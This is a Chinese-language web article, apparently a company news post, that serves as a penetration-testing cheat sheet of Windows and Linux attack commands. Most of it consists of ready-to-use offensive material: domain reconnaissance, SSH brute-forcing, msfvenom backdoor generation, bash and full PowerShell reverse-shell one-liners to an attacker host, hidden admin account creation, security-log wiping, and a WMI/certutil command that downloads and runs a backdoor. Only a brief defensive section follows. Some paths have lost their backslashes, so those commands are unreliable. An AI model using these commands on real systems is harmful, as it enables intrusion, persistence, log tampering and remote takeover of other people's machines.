新闻中心
网络安全攻防实战CMD命令全解析与高效脚本工具应用指南
发布日期:2025-04-07 04:22:19 点击次数:105

网络安全攻防实战CMD命令全解析与高效脚本工具应用指南

一、基础信息收集与网络探测

1. 主机存活探测

  • Nmap扫描
  • `nmap -sP 网段`:通过ICMP Ping扫描存活主机,快速定位活跃设备。
  • `nmap -PR 网段`:使用ARP协议扫描内网主机,适用于防火墙禁Ping的场景。
  • Ping与Tracert
  • `ping 192.168.1.1`:测试目标主机的连通性和延迟,支持`-t`持续探测。
  • `tracert www.google.com`:追踪数据包路径,排查网络延迟或路由异常。
  • 2. 网络配置与连接状态

  • `ipconfig /all`:查看本机IP、子网掩码、网关及DNS信息,常用于内网拓扑分析。
  • `netstat -ano`:显示所有端口监听状态及关联进程PID,识别异常连接(如后门端口)。
  • `arp -a`:查看ARP缓存表,排查IP冲突或中间人攻击痕迹。
  • 3. 域环境信息收集

  • `net user /domain`:枚举域用户列表,辅助社工或横向渗透。
  • `net group "Domain Admins" /domain`:获取域管理员组信息,定位高价值目标。
  • `nltest /domain_trusts`:查询域信任关系,规划跨域攻击路径。
  • 二、渗透攻击与漏洞利用

    1. 漏洞扫描与利用

  • Nmap脚本引擎
  • `nmap --script smb-vuln-ms17-010 目标IP`:检测永恒之蓝漏洞(CVE-2017-0144)。
  • Hydra爆破工具
  • `hydra -L users.txt -P pass.txt ssh://目标IP`:爆破SSH服务,支持SMB、RDP等协议。
  • 2. Payload生成与反弹Shell

  • MSFvenom生成木马
  • `msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=4444 -f exe > backdoor.exe`:生成Windows反向连接木马。
  • 反弹Shell命令
  • `bash -i >& /dev/tcp/攻击机IP/端口 0>&1`:Linux系统反弹Shell至攻击机。
  • `powershell -c "$client = New-Object System.Net.Sockets.TCPClient('攻击机IP',端口);$stream = $client.GetStream;[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush};$client.Close"`:PowerShell无文件反弹Shell。
  • 3. Meterpreter后渗透操作

  • `sessions -u 会话ID`:将普通Shell升级为Meterpreter会话。
  • `shell`:进入系统原生Shell,执行本地命令(如添加用户、提权)。
  • `chcp 65001`:解决Windows Shell中文乱码问题。
  • 三、后渗透与权限维持

    1. Windows系统操作

  • 用户与权限管理
  • `net user hacker Password123! /add`:添加用户并加入管理员组:`net localgroup administrators hacker /add`。
  • 远程桌面配置
  • `REG ADD "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f`:开启RDP服务。
  • 2. 痕迹清理与日志管理

  • `wevtutil cl Security`:清除安全事件日志(需管理员权限)。
  • `cleanmgr /sagerun:65535`:使用磁盘清理工具删除临时文件及系统缓存。
  • 3. 内网横向移动

  • `wmic /node:目标IP /user:domainuser /password:pass process call create "cmd.exe /c certutil -urlcache -split -f http://攻击机IP/backdoor.exe C:backdoor.exe"`:通过WMI远程下载并执行恶意文件。
  • `psexec.exe 目标IP -u user -p pass -s cmd.exe`:使用PsExec工具远程执行命令。
  • 四、高效脚本工具与自动化框架

    1. 信息收集自动化

  • OneForAll:子域名枚举工具,集成DNS爆破、证书透明日志等多种数据源。
  • ARL灯塔系统:资产侦察与威胁监控,支持API集成和可视化分析。
  • 2. 漏洞利用框架

  • Metasploit
  • `use exploit/multi/handler`:配置监听模块,与生成的Payload配合获取会话。
  • Pocsuite3:开源漏洞验证框架,支持自定义PoC和批量扫描。
  • 3. 内网渗透工具

  • Cobalt Strike:团队协作渗透平台,支持Beacon通信、横向移动和权限维持。
  • Impacket工具集:提供SMB、Kerberos协议攻击脚本(如ntlmrelayx.py)。
  • 五、防御建议与安全加固

    1. 命令监控与拦截:通过EDR/SIEM系统监控敏感命令(如`net user`、`reg add`)。

    2. 最小权限原则:限制用户权限,禁用默认共享(如`net share C$ /delete`)。

    3. 定期漏洞扫描:使用Nessus或OpenVAS检测系统漏洞,及时修补。

    引用与扩展工具

  • 完整命令手册参考:
  • 自动化工具集合:
  • 防御策略与日志分析:
  • 通过结合CMD命令与自动化工具,攻防双方可显著提升效率。建议在实际环境中严格测试命令兼容性,并遵守法律法规。

    友情链接: